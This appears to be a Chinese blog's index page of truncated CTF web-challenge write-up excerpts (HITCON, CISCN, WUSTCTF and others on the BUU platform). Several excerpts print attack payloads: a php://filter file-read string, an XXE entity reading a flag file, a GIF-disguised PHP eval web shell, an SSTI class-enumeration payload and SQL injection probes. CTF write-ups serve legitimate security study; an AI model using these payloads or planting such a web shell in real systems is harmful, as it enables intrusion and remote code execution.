随笔分类 -  网安 / 题库 / BUU

上一页 1 2 3 4 5 下一页

[HITCON 2017]SSRFme
摘要:[HITCON 2017]SSRFme 打开环境就是代码审计 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); 阅读全文

posted @ 2024-06-11 14:33 跳河离去的鱼 阅读(65) 评论(0) 推荐(0) 编辑

[CISCN2019 华北赛区 Day1 Web5]CyberPunk
摘要:[CISCN2019 华北赛区 Day1 Web5]CyberPunk 在源代码中发现提示可能存在文件包含,并且还有search.php,change.php,delete.php这三个文件,通过php伪协议进行读取 ?file=php://filter/convert.base64-encode/ 阅读全文

posted @ 2024-06-05 20:12 跳河离去的鱼 阅读(42) 评论(0) 推荐(0) 编辑

[NCTF2019]True XML cookbook
摘要:[NCTF2019]True XML cookbook 打开环境是之前一道题的登录框 先按原来那道题的payload进行测试,payload和结果如下: <?xml version="1.0" ?> <!DOCTYPE llw [ <!ENTITY file SYSTEM "file:///flag 阅读全文

posted @ 2024-05-20 09:16 跳河离去的鱼 阅读(112) 评论(0) 推荐(0) 编辑

[GWCTF 2019]枯燥的抽奖
摘要:[GWCTF 2019]枯燥的抽奖 打开环境,提示猜测完整字符串 在源代码中发现有个check.php文件 打开直接看到源码 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start( 阅读全文

posted @ 2024-05-19 10:45 跳河离去的鱼 阅读(80) 评论(0) 推荐(0) 编辑

[RCTF2015]EasySQL
摘要:[RCTF2015]EasySQL 打开环境,有一个注册一个登录按钮 这里注册的时候有个坑,邮箱那栏你不能输入@xx.com,否则就会报错不允许的字符 fuzz测试一下发现过滤了不少字符 注册完成后登录 首页的文字没有什么有用的信息,进入帐号发现可以修改密码 如果是正常的账号,此时修改密码不会有任何 阅读全文

posted @ 2024-05-14 16:12 跳河离去的鱼 阅读(198) 评论(0) 推荐(0) 编辑

[红明谷CTF 2021]write_shell
摘要:[红明谷CTF 2021]write_shell 打开环境直接给出源代码 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+ 阅读全文

posted @ 2024-05-11 15:03 跳河离去的鱼 阅读(84) 评论(0) 推荐(0) 编辑

[watevrCTF-2019]Cookie Store
摘要:[watevrCTF-2019]Cookie Store 打开环境,发现第3个商品是flag cookie,但是要100刀,而我们只有50刀,买不起 点击第1个抓包 将session里的字符解码 看到了我们剩余的钱数是49,改成500,再把post的数据id=0改为id=2用来买我们的3号商品fla 阅读全文

posted @ 2024-05-10 16:01 跳河离去的鱼 阅读(49) 评论(0) 推荐(0) 编辑

[WUSTCTF2020]CV Maker
摘要:[WUSTCTF2020]CV Maker 打开环境 注册了账号登陆,发现有上传头像的地方,尝试上传文件 可以上传图片马 GIF89a <script language='php'> @eval($_POST['shell']);</script> BP里抓包改为php,得到上传成功路径http:/ 阅读全文

posted @ 2024-05-04 16:00 跳河离去的鱼 阅读(94) 评论(0) 推荐(0) 编辑

[CSCCTF 2019 Qual]FlaskLight
摘要:[CSCCTF 2019 Qual]FlaskLight 打开环境 源代码里发现可通过GET方式传入参数 简单验证发现存在SSTI {{''.__class__.__mro__[2].__subclasses__()}} #可以爆出所有的类 编写脚本查找可利用的类 利用subprocess.Pope 阅读全文

posted @ 2024-05-03 15:35 跳河离去的鱼 阅读(11) 评论(0) 推荐(0) 编辑

[Zer0pts2020]Can you guess it?
摘要:[Zer0pts2020]Can you guess it? 打开环境没有什么特殊的地方,可以点击按钮查看源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/ 阅读全文

posted @ 2024-05-02 14:34 跳河离去的鱼 阅读(4) 评论(0) 推荐(0) 编辑

[MRCTF2020]套娃
摘要:[MRCTF2020]套娃 打开环境发现有张图片显示不出来 查看网页源代码发现部分代码 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 阅读全文

posted @ 2024-05-01 11:05 跳河离去的鱼 阅读(80) 评论(0) 推荐(0) 编辑

[WUSTCTF2020]颜值成绩查询
摘要:[WUSTCTF2020]颜值成绩查询 打开环境是一个成绩查询的页面 1.手工注入 输入1发现有admin的账号和得分 输入1'会提示学号不存在 1/**/or/**/1=1# 过滤了空格 1/**/order/**/by/**/3# 存在 1/**/order/**/by/**/4# 不存在 由此 阅读全文

posted @ 2024-04-30 17:04 跳河离去的鱼 阅读(331) 评论(0) 推荐(0) 编辑

[FBCTF2019]RCEService
摘要:[FBCTF2019]RCEService 打开环境,提示输入JSON格式 输入 {"cmd":"ls"},只有一个index,php,而且不能读取 到这卡住了,找了师傅们的WP发现源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_ 阅读全文

posted @ 2024-04-29 08:46 跳河离去的鱼 阅读(155) 评论(0) 推荐(0) 编辑

[GYCTF2020]FlaskApp
摘要:[GYCTF2020]FlaskApp 打开环境是一个base64编解码的网站 提示里是一张图片 源码提示PIN 尝试输入错误字符看看页面结果,于是在解码页面输入123 有源码泄露 @app.route('/decode',methods=['POST','GET']) def decode(): 阅读全文

posted @ 2024-04-28 09:43 跳河离去的鱼 阅读(389) 评论(0) 推荐(0) 编辑

[SUCTF 2019]Pythonginx
摘要:[SUCTF 2019]Pythonginx 打开环境 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).host 阅读全文

posted @ 2024-04-27 15:13 跳河离去的鱼 阅读(156) 评论(0) 推荐(0) 编辑

[BJDCTF2020]EasySearch
摘要:[BJDCTF2020]EasySearch 打开环境 页面中与源代码没有发现什么有用的信息,通过扫描工具扫描,看看有没有什么有用的文件 结果发现无论是dirsearch、dirmap还是御剑,通通扫描不出来什么有用的东西,查了师傅们的WP才知道,这里的文件名是index.php.swp <?php 阅读全文

posted @ 2024-04-26 15:54 跳河离去的鱼 阅读(43) 评论(0) 推荐(0) 编辑

[De1CTF 2019]SSRF Me
摘要:[De1CTF 2019]SSRF Me 整理代码 #!/usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import 阅读全文

posted @ 2024-04-25 18:50 跳河离去的鱼 阅读(216) 评论(0) 推荐(0) 编辑

[BSidesCF 2019]Futurella
摘要:[BSidesCF 2019]Futurella 打开题目没看太懂是什么东西 检查源代码发现flag 阅读全文

posted @ 2024-04-25 16:31 跳河离去的鱼 阅读(22) 评论(0) 推荐(0) 编辑

[BSidesCF 2019]Kookie
摘要:[BSidesCF 2019]Kookie 提示我们使用admin账户登录,并且明示了当前存在一个cookie账户其密码为monster 登录并抓包,可以观察到设置了一个Cookie,内容为username=cookie的键值对。 显然这里Cookie中的键值对的值作为了服务端在用户通过账户密码登录 阅读全文

posted @ 2024-04-17 08:57 跳河离去的鱼 阅读(73) 评论(0) 推荐(0) 编辑

[CISCN 2019 初赛]Love Math
摘要:[CISCN 2019 初赛]Love Math <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $conte 阅读全文

posted @ 2024-04-16 15:20 跳河离去的鱼 阅读(66) 评论(0) 推荐(0) 编辑

上一页 1 2 3 4 5 下一页
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

点击右上角即可分享
微信分享提示